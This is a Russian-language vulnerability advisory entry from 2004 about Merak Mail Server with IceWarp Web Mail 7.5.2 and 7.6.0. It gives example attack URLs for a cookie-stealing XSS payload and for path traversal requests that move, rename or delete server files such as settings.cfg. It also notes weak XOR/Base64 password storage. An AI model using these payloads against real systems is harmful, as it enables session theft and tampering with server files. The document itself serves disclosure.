| Дата публикации: | 09.11.2004 |
| Всего просмотров: | 1518 |
| Опасность: | Средняя |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: Merak Mail Server with IceWarp Web Mail 7.5.2, 7.6.0
Описание: Некоторые сценарии некорректно обрабатывают входные данные пользователей. Удаленный атакующий может создать специально сформированный URL и получить доступ к важным данным пользователей. Примеры:
http://[target]:32000/mail/send.html?id=[sessionid]&redirectfile="><script>alert(document.cookie)</script> Также сообщается, что удаленный авторизованный пользователь может из-за уязвимости в сценарии 'viewaction.html' создать и удалить произвольные директории на сервере. Пример: http://[target]:32000/mail/viewaction.html?id=[sessionid]&folder=../../../../../../../[arbitary directory]&Move_x=1&originalfolder=blabla http://[target]:32000/mail/viewaction.html?id=[sessionid]&messageid=...//...//...//...//…//…//…//winnt/system32/cmd.exe& Удаленный авторизованный атакующий может перемесить произвольные файлы на системе: http://[target]:32000/mail/viewaction.html?id=[session id]&messageid=...//...//...//...//config/settings.cfg&Move_x=1&originalfolder=blabla&m Удаленный авторизованный пользователь может переименовать произвольный файл на системе: http://[target]:32000/mail/folders.html?id=[sessionid]& folderold=blabla/...//...//...//...//config/settings.cfg&folder=blabla/...//...//...//...//cm Локальный пользователь может расшифровать пароли пользователей, которые хранятся в файлах users.cfg, settings.cfg (XOR), users.dat, and user.dat (Base64) Удаленный авторизованный пользователь может создать файл 'accounts.dat' с произвольным содержимым. URL производителя: www.icewarp.com Решение: Решение на данный момент не существует. |
|
| Ссылки: | Merak Mail Server (with IceWarp Web Mail) Lets Remote Authenticated Users Move, Delete, and Rename Files |